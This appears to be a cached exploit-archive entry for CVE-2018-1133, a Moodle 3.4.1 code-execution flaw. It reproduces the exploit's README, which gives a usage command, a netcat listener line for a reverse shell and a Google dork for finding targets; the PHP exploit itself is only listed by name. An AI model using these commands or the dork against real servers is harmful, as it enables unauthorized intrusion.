CVE-2018-1133 PoC — Moodle 代码注入漏洞

Source

https://github.com/darrynten/MoodleExploit

Associated Vulnerability

Title:Moodle 代码注入漏洞 (CVE-2018-1133)
Description:Moodle是澳大利亚马丁-多基马（Martin Dougiamas）博士开发的一套免费、开源的电子学习软件平台，也称课程管理系统、学习管理系统或虚拟学习环境。 Moodle 3.x版本中存在安全漏洞。远程攻击者可利用该漏洞在服务器上执行代码。

Description

Noodle [Moodle RCE] (v3.4.1) - CVE-2018-1133

Readme

# Moodle Exploit

* Exploit Title: Moodle v3.4.1 RCE Exploit
* Google Dork: inurl:"/course/jumpto.php?jump="
* Date: 15 March 2019
* Exploit Author: Darryn Ten
* Vendor Homepage: https://moodle.org
* Software Link: https://github.com/moodle/moodle/archive/v3.4.1.zip
* Version: 3.4.1 (Possibly < 3.5.0 and maybe even 3.x)
* Tested on: Linux with Moodle v3.4.1
* CVE : CVE-2018-1133

A user with the teacher role is able to execute arbitrary code.

# Usage

`php MoodleExploit.php url=http://example.com user=teacher pass=password ip=10.10.10.10 port=1010 course=1`

```
user       The account username
pass       The password to the account
ip         Callback IP
port       Callback Port
course     Valid course ID belonging to the teacher
```

Make sure you're running a netcat listener on the specified port before
executing this script.

`nc -lnvp 1010`

This will attempt to open up a reverse shell to the listening IP and port.

# Notes

This exploit is based on information provided by Robin Peraglie.

Additional Reading: https://blog.ripstech.com/2018/moodle-remote-code-execution

File Snapshot


 [4.0K]  /data/pocs/170dc4bcf278b42a06a5a4702c0e23d6ef219baa
├── [ 20K]  MoodleExploit.php
└── [1.1K]  README.md

0 directories, 2 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!